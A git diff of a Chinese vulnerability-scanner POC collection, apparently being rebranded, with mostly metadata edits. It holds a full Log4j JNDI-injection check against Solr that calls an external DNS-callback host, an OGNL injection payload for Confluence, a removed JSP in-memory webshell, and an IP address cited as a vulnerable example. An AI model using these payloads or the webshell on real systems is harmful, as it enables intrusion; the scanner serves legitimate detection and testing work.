diff --git a/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc b/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..9aba519
Binary files /dev/null and b/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/360/TianQing_Unauth_Acceess/poc.py b/poc/360/TianQing_Unauth_Acceess/poc.py
index c237c20..61ddb68 100644
--- a/poc/360/TianQing_Unauth_Acceess/poc.py
+++ b/poc/360/TianQing_Unauth_Acceess/poc.py
@@ -9,7 +9,7 @@ urllib3.disable_warnings()
class POC(POCBase):
-
+
_info = {
"author" : "jijue", # POC作者
diff --git a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c73dba0
Binary files /dev/null and b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py
index 6d005fd..8e01efd 100644
--- a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py
+++ b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "mini_httpd任意文件读取漏洞(CVE-2018-18778)", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "ACME mini_httpd before 1.30", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b33cf05
Binary files /dev/null and b/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Alibaba_Druid/Unauth_Access/poc.pyc b/poc/Alibaba_Druid/Unauth_Access/poc.pyc
index e220e4e..40f4172 100644
Binary files a/poc/Alibaba_Druid/Unauth_Access/poc.pyc and b/poc/Alibaba_Druid/Unauth_Access/poc.pyc differ
diff --git a/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..ea21624
Binary files /dev/null and b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py
similarity index 93%
rename from poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py
rename to poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py
index a608be5..844adb9 100644
--- a/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py
+++ b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py
@@ -9,12 +9,12 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : "hansi", # POC作者
+ "author" : "jijue", # POC作者
"version" : "1", # POC版本,默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
- 组件类的漏洞并不适合直接拿到BLEN里批量扫,失败是可以预见的事情,笔者建议的是在渗透过程中将可疑的url拿来测试
+ 组件类的漏洞并不适合直接拿到oFx里批量扫,失败是可以预见的事情,笔者建议的是在渗透过程中将可疑的url拿来测试
""", # POC描述,写更新描述,没有就不写
"name" : "Fastjson 反序列化远程代码执行漏洞(CVE-2017-18349)", # 漏洞名称
@@ -36,7 +36,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a34f0fa
Binary files /dev/null and b/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Alibaba_Nacos/Unauth_Access/poc.pyc b/poc/Alibaba_Nacos/Unauth_Access/poc.pyc
index 241e773..4e85445 100644
Binary files a/poc/Alibaba_Nacos/Unauth_Access/poc.pyc and b/poc/Alibaba_Nacos/Unauth_Access/poc.pyc differ
diff --git a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c4cbfb7
Binary files /dev/null and b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py
index 1ed5bc9..62e5041 100644
--- a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py
+++ b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py
@@ -9,7 +9,7 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : "jijue&&hansi", # POC作者
+ "author" : "jijue", # POC作者
"version" : "1", # POC版本,默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
@@ -36,7 +36,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d183570
Binary files /dev/null and b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py
index db554d1..18a2f0b 100644
--- a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py
+++ b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py
@@ -14,7 +14,7 @@ class POC(POCBase):
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
- 略
+ 略
""", # POC描述,写更新描述,没有就不写
"name" : "Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)", # 漏洞名称
@@ -27,7 +27,7 @@ class POC(POCBase):
""", # 漏洞简要描述
"fofa-dork":"""
-
+ app="APACHE-ActiveMQ"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url,写一个就可以了
"exp_img" : "", # 先不管
@@ -52,38 +52,7 @@ class POC(POCBase):
}
filename = random_str()
filecontent = random_str()
-# filecontent = """
-# <%!
-# class ON extends ClassLoader{
-# ON(ClassLoader c){super(c);}
-# public Class qualified(byte[] b){
-# return super.defineClass(b, 0, b.length);
-# }
-# }
-# public byte[] interacts(String str) throws Exception {
-# Class base64;
-# byte[] value = null;
-# try {
-# base64=Class.forName("sun.misc.BASE64Decoder");
-# Object decoder = base64.newInstance();
-# value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
-# } catch (Exception e) {
-# try {
-# base64=Class.forName("java.util.Base64");
-# Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
-# value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
-# } catch (Exception ee) {}
-# }
-# return value;
-# }
-# %>
-# <%
-# String cls = request.getParameter("123");
-# if (cls != null) {
-# new ON(this.getClass().getClassLoader()).qualified(interacts(cls)).newInstance().equals(new Object[]{request,response});
-# }
-# %>
-# """
+
try:
"""
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
diff --git a/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c689c98
Binary files /dev/null and b/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..cf2d480
Binary files /dev/null and b/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..4b1fc10
Binary files /dev/null and b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py
index bc804bc..6ca3d93 100644
--- a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py
+++ b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py
@@ -38,7 +38,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..e11b92a
Binary files /dev/null and b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py
index 9b996f6..2ab92eb 100644
--- a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py
+++ b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py
@@ -39,7 +39,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc b/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..86fba97
Binary files /dev/null and b/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc b/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7ace203
Binary files /dev/null and b/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc b/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8f26e92
Binary files /dev/null and b/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc b/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..fc690d4
Binary files /dev/null and b/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py b/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py
deleted file mode 100644
index f70674d..0000000
--- a/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py
+++ /dev/null
@@ -1,72 +0,0 @@
-# coding:utf-8
-import requests
-from lib.core.common import url_handle,get_random_ua
-from lib.core.poc import POCBase
-# ...
-import urllib3
-urllib3.disable_warnings()
-
-class POC(POCBase):
-
- _info = {
- "author" : "hansi", # POC作者
- "version" : "1", # POC版本,默认是1
- "CreateDate" : "2022-01-10", # POC创建时间
- "UpdateDate" : "2022-01-10", # POC创建时间
- "PocDesc" : """
- 略
- """, # POC描述,写更新描述,没有就不写
-
- "name" : "Apache Kudu存在未授权访问漏洞", # 漏洞名称
- "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
- "AppName" : "Apache Kudu未授权访问漏洞", # 漏洞应用名称
- "AppVersion" : "", # 漏洞应用版本
- "VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
- "VulnDesc" : """
-
- """, # 漏洞简要描述
-
- "fofa-dork":"""
- ”Kudu”
- """, # fofa搜索语句
- "example" : "http://111.1.10.15:8060/", # 存在漏洞的演示url,写一个就可以了
- "exp_img" : "", # 先不管
- }
-
- def _verify(self):
- """
- 返回vuln
-
- 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
-
- 不存在漏洞:vuln = [False,""]
- """
- vuln = [False,""]
- url = self.target + "" # url自己按需调整
-
- headers = {"User-Agent":get_random_ua(),
- "Connection":"close",
- "Content-Type": "application/x-www-form-urlencoded",
- }
-
- try:
- """
- 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
- """
- req = requests.get(url,headers = headers ,proxies = self.proxy ,timeout = self.timeout,verify = False)
- if req.status_code ==200 and "RPCs" in req.text:
- vuln = [True,req.text]
- else:
- vuln = [False,req.text]
- except Exception as e:
- raise e
-
- # 以下逻辑酌情使用
- if self._honeypot_check(vuln[1]) == True:
- vuln[0] = False
-
- return vuln
-
- def _attack(self):
- return self._verify()
-
diff --git a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..ac686cb
Binary files /dev/null and b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py
index e89e4b5..0fea246 100644
--- a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py
+++ b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py
@@ -17,7 +17,7 @@ class POC(POCBase):
略
""", # POC描述,写更新描述,没有就不写
- "name" : "Apache Kylin 未授权配置泄露 CVE-2020-13937", # 漏洞名称
+ "name" : "Apache Kylin 未授权配置泄露(CVE-2020-13937)", # 漏洞名称
"VulnID" : "CVE-2020-13937", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "Apache Kylin", # 漏洞应用名称
"AppVersion" : """
@@ -59,7 +59,7 @@ class POC(POCBase):
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
- if "config" in req.text:#req.status_code == 200 and :
+ if '{"config":"' in req.text:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
diff --git a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..2ea091c
Binary files /dev/null and b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py
index cc8b8b8..6af5175 100644
--- a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py
+++ b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "Apache Mod_jk 访问控制权限绕过(CVE-2018-11759)", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "Apache Mod_jk", # 漏洞应用名称
"AppVersion" : "Apache Mod_jk Connector 1.2.0 ~ 1.2.44", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..5c6a954
Binary files /dev/null and b/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..4f5226e
Binary files /dev/null and b/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Solr/File_Read/poc.py b/poc/Apache_Solr/File_Read/poc.py
index d35d09a..44ac91f 100644
--- a/poc/Apache_Solr/File_Read/poc.py
+++ b/poc/Apache_Solr/File_Read/poc.py
@@ -21,7 +21,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "Apache Solr 任意文件读取漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "Apache Solr", # 漏洞应用名称
"AppVersion" : "Apache Solr <= 8.8.1", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..df20738
Binary files /dev/null and b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py
new file mode 100644
index 0000000..6435d44
--- /dev/null
+++ b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py
@@ -0,0 +1,85 @@
+# coding:utf-8
+import requests
+import time
+from lib.core.common import get_ceye_dns, url_handle,get_random_ua,random_str,verify_ceye_dns
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 该漏洞没有回显,因此POC需要接通dns平台,现已支持知道创宇的ceye,配置位置为项目根目录下的info.ini
+ 这是笔者针对没有回显的漏洞写的第一个oFx POC,以后不会解释这么多
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Apache Solr 远程命令执行 Log4j", # 漏洞名称
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "Apache Solr", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ Apache Solr引用了Log4j,因为CVE-2021-44228 balabalaba。。我编不出来了,大概的意思懂得都懂
+ 笔者最早是在PeiQi看到的,就写了这么个东西
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+
+ success,dns_flag = get_ceye_dns()
+ if success == False:
+ return [False,dns_flag]
+
+ url = self.target + "/solr/admin/collections?action=$%7bjndi:ldap://"+dns_flag+"%7d&wt=jso" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+
+ flager = verify_ceye_dns(dns_flag)
+
+ if flager == True:
+ vuln = [True,dns_flag]
+ elif flager == False:
+ vuln = [False,dns_flag]
+ else:
+ vuln = [False,flager]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a8507fd
Binary files /dev/null and b/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/BSPHP/Info_Disclosure/poc.py b/poc/BSPHP/Info_Disclosure/poc.py
index 20c434a..a0f8b9b 100644
--- a/poc/BSPHP/Info_Disclosure/poc.py
+++ b/poc/BSPHP/Info_Disclosure/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "BSPHP 未授权访问 信息泄露漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "BSPHP", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc b/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..477d82b
Binary files /dev/null and b/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py b/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py
index 47b317a..fda7ba5 100644
--- a/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py
+++ b/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "碧海威 L7 弱口令漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "碧海威 L7", # 漏洞应用名称
"AppVersion" : "None", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc b/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..04fb58e
Binary files /dev/null and b/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..4944fad
Binary files /dev/null and b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py
index 899d06b..9e62291 100644
--- a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py
+++ b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "中国移动 禹路由", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d4eef4d
Binary files /dev/null and b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py
index 45dd5f1..28362b5 100644
--- a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py
+++ b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "电信天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "电信天翼网关F460", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2014-03-03", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc b/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..e3d830d
Binary files /dev/null and b/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc b/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c7b08b4
Binary files /dev/null and b/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py b/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py
index f005b6b..4605c61 100644
--- a/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py
+++ b/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py
@@ -53,7 +53,7 @@ class POC(POCBase):
"""
vuln = [False,""]
url = self.target + "/pages/createpage-entervariables.action?SpaceKey=x" # url自己按需调整
- data = "queryString=Blen\\u0027%2b#{6*666}%2b\\u0027"
+ data = "queryString=ofx\\u0027%2b#{6*666}%2b\\u0027"
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
@@ -65,7 +65,7 @@ class POC(POCBase):
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
"""
